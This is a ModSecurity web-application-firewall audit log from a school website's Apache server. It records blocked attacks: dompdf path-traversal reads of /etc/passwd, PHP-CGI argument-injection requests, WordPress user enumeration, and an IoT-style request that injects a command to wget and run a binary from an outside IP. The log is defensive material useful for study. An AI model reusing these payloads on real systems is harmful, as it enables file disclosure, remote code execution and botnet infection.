Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fa644f1a-E-- --fa644f1a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469117 1654 (- - -) Stopwatch2: 1748673628469117 1654; combined=448, p1=273, p2=146, p3=0, p4=0, p5=28, sr=47, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa644f1a-Z-- --a71c270f-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzAAAAMw 103.236.140.4 47444 103.236.140.4 8181 --a71c270f-B-- GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 166811591 --a71c270f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a71c270f-E-- --a71c270f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469537 1388 (- - -) Stopwatch2: 1748673628469537 1388; combined=334, p1=234, p2=72, p3=0, p4=0, p5=27, sr=43, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a71c270f-Z-- --f1239c2b-A-- [31/May/2025:13:40:28 +0700] aDqkXB_L2Rte6DjSjWYwSgAAAIs 103.236.140.4 47430 103.236.140.4 8181 --f1239c2b-B-- GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/129.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 166967378 --f1239c2b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1239c2b-E-- --f1239c2b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469885 1285 (- - -) Stopwatch2: 1748673628469885 1285; combined=388, p1=280, p2=86, p3=0, p4=0, p5=22, sr=45, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1239c2b-Z-- --bde5ae1c-A-- [31/May/2025:13:40:28 +0700] aDqkXOg1nD2n5twq7Ns7vgAAAEQ 103.236.140.4 47424 103.236.140.4 8181 --bde5ae1c-B-- POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 34 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114, 103.236.140.4 Cookie: X-Varnish: 151622786 --bde5ae1c-C-- --bde5ae1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bde5ae1c-E-- --bde5ae1c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748673628469059 2543 (- - -) Stopwatch2: 1748673628469059 2543; combined=1671, p1=324, p2=1330, p3=0, p4=0, p5=17, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bde5ae1c-Z-- --9966ed26-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzwAAANg 103.236.140.4 47488 103.236.140.4 8181 --9966ed26-B-- GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169673110 --9966ed26-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9966ed26-E-- --9966ed26-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628470210 1605 (- - -) Stopwatch2: 1748673628470210 1605; combined=379, p1=290, p2=72, p3=0, p4=0, p5=17, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9966ed26-Z-- --82c32047-A-- [31/May/2025:13:40:28 +0700] aDqkXJ3Kgs4r2wz12c6O9gAAAAw 103.236.140.4 47490 103.236.140.4 8181 --82c32047-B-- GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 123499265 --82c32047-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --82c32047-E-- --82c32047-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628470426 1646 (- - -) Stopwatch2: 1748673628470426 1646; combined=357, p1=258, p2=83, p3=0, p4=0, p5=16, sr=58, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82c32047-Z-- --672ef274-A-- [31/May/2025:13:40:28 +0700] aDqkXB_L2Rte6DjSjWYwSQAAAI0 103.236.140.4 47456 103.236.140.4 8181 --672ef274-B-- GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 150934211 --672ef274-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --672ef274-E-- --672ef274-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469614 2613 (- - -) Stopwatch2: 1748673628469614 2613; combined=546, p1=402, p2=116, p3=0, p4=0, p5=28, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --672ef274-Z-- --7c90f330-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzQAAAM4 103.236.140.4 47438 103.236.140.4 8181 --7c90f330-B-- GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 163078375 --7c90f330-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7c90f330-E-- --7c90f330-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469614 2721 (- - -) Stopwatch2: 1748673628469614 2721; combined=598, p1=406, p2=155, p3=0, p4=0, p5=37, sr=58, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c90f330-Z-- --e99a380a-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzgAAANM 103.236.140.4 47484 103.236.140.4 8181 --e99a380a-B-- GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169048261 --e99a380a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e99a380a-E-- --e99a380a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628470063 2391 (- - -) Stopwatch2: 1748673628470063 2391; combined=619, p1=414, p2=154, p3=0, p4=0, p5=51, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e99a380a-Z-- --b2925d25-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6L0AAAAMk 103.236.140.4 47444 103.236.140.4 8181 --b2925d25-B-- GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 154654266 --b2925d25-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b2925d25-E-- --b2925d25-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628471146 1471 (- - -) Stopwatch2: 1748673628471146 1471; combined=399, p1=291, p2=70, p3=0, p4=0, p5=37, sr=43, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2925d25-Z-- --e2702741-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6L0QAAANA 103.236.140.4 47484 103.236.140.4 8181 --e2702741-B-- GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 164649756 --e2702741-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e2702741-E-- --e2702741-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748673628472615 1562 (- - -) Stopwatch2: 1748673628472615 1562; combined=488, p1=362, p2=100, p3=0, p4=0, p5=26, sr=104, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2702741-Z-- --41980f50-A-- [31/May/2025:14:00:48 +0700] aDqpIOg1nD2n5twq7Ns_ugAAAEk 103.236.140.4 35150 103.236.140.4 8181 --41980f50-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --41980f50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41980f50-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748674848681833 998 (- - -) Stopwatch2: 1748674848681833 998; combined=430, p1=390, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41980f50-Z-- --eadf9804-A-- [31/May/2025:14:04:15 +0700] aDqp7-g1nD2n5twq7NtAiwAAAEc 103.236.140.4 37872 103.236.140.4 8181 --eadf9804-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eadf9804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eadf9804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748675055387396 2819 (- - -) Stopwatch2: 1748675055387396 2819; combined=1263, p1=428, p2=805, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eadf9804-Z-- --81afdd35-A-- [31/May/2025:14:05:20 +0700] aDqqMB_L2Rte6DjSjWY0wAAAAIs 103.236.140.4 38292 103.236.140.4 8181 --81afdd35-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.0.17.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.0.17.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81afdd35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81afdd35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748675120400091 3626 (- - -) Stopwatch2: 1748675120400091 3626; combined=1491, p1=468, p2=983, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81afdd35-Z-- --6ad0cb40-A-- [31/May/2025:14:06:40 +0700] aDqqgOg1nD2n5twq7NtA6QAAAE0 103.236.140.4 39068 103.236.140.4 8181 --6ad0cb40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.85.82.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.85.82.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6ad0cb40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ad0cb40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748675200489984 2938 (- - -) Stopwatch2: 1748675200489984 2938; combined=1363, p1=433, p2=901, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ad0cb40-Z-- --9d2ea067-A-- [31/May/2025:14:25:31 +0700] aDqu653Kgs4r2wz12c6XtQAAABI 103.236.140.4 53660 103.236.140.4 8181 --9d2ea067-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --9d2ea067-C-- --9d2ea067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 